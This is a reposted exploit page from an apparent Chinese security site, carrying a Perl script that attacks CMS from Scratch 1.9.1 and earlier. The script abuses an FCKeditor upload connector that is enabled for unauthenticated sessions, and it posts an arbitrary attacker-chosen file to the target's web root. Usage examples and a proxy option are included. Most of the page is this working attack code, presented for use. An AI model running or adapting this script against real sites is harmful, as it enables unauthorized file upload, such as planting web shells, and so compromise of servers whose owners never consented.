首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit
来源:staker[at]hotmail[dot]it 作者:staker 发布时间:2009-02-03  
#!/usr/bin/perl
# ----------------------------------------------------------------
# CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit
# by yeat - staker[at]hotmail[dot]it
# http://scratchwebdesignforums.com/forums/index.php?showtopic=629
# ----------------------------------------------------------------
# (fckeditor/editor/filemanager/connectors/php/config.php)
# 25. global $Config ;
# 26.
# 27. $Config['Enabled'] = (isset($_SESSION['loginStatus']) ||
#     $_SESSION == NULL) ? true : false ; 
# ...
# 39. $Config['UserFilesAbsolutePath'] =
#     realpath($_SERVER['DOCUMENT_ROOT']);
# ----------------------------------------------------------------

use Getopt::Std;
use LWP::UserAgent;

getopts('p:',\my %opts);

my $http = new LWP::UserAgent;
my ($host,$file) = @ARGV;


Main::RunExploit();


# Main Package

package Main;


sub Usage {

return print <<EOF;
+------------------------------------------------------------------+
| CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit |
+------------------------------------------------------------------+
by yeat - staker[at]hotmail[dot]it

Usage: perl xpl.pl host/path file [OPTIONS]
host: target host and cms path
file: file to upload

Options:

-p [specify a proxy] [server]:[port]

Example:
perl xpl.pl localhost/cms yeat.jpg
perl xpl.pl localhost/cms yeat.jpg -p 213.151.89.109:80

EOF

}


sub RunExploit
{   
    if (defined $opts{p}) {
        HTTP::Proxy($opts{p});
    }
   
    if (@ARGV < 2 || @ARGV > 4) {
        Main::Usage();
    }
    else {   
        FileUpload::Exploit($file);
    }   
}



# File Upload Package

package FileUpload;

sub Exploit
{
    my $file = shift;
    my $path = "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File";


    my $data = { NewFile => [$file,$file] };
   
    my $send = $http->post('http://'.$host.$path,
                           $data,
                           Content_Type => 'multipart/form-data',
                          );
   
    if ($send->is_success) {
        print $send->content;
        exit;                       
    }
    else {
        print "Exploit Failed!\n";
        exit;
    }    
}  
                                



# HTTP Package

package HTTP;


sub Cookies
{
    return $http->default_header('Cookie' => $_[0]);
}


sub UserAgent
{
    return $http->agent($_[0]);
}   


sub GET
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }   
    else {
        return $http->get($_[0]);
    }   
}
   

sub http_header
{
    return $http->default_header($_[0]);
}           

   
sub Proxy
{
    return $http->proxy('http', 'http://'.$_[0]);  
}  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KIS 2008 and Kaspersky AntiVir
·Free Download Manager <= 3.0 B
·OpenHelpDesk 1.0.100 eval() Co
·Euphonics Audio Player v1.0 (.
·phpslash <= 0.8.1.1 Remote Cod
·WEBalbum 2.4b (photo.php id) B
·eVision CMS 2.0 Remote Code Ex
·Hex Workshop v6 (ColorMap file
·CMS Mini <= 0.2.2 Remote Comma
·TxtBlog 1.0 Alpha Remote Comma
·phpBLASTER 1.0 RC1 (blaster_us
·DreamPics Photo/Video Gallery
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved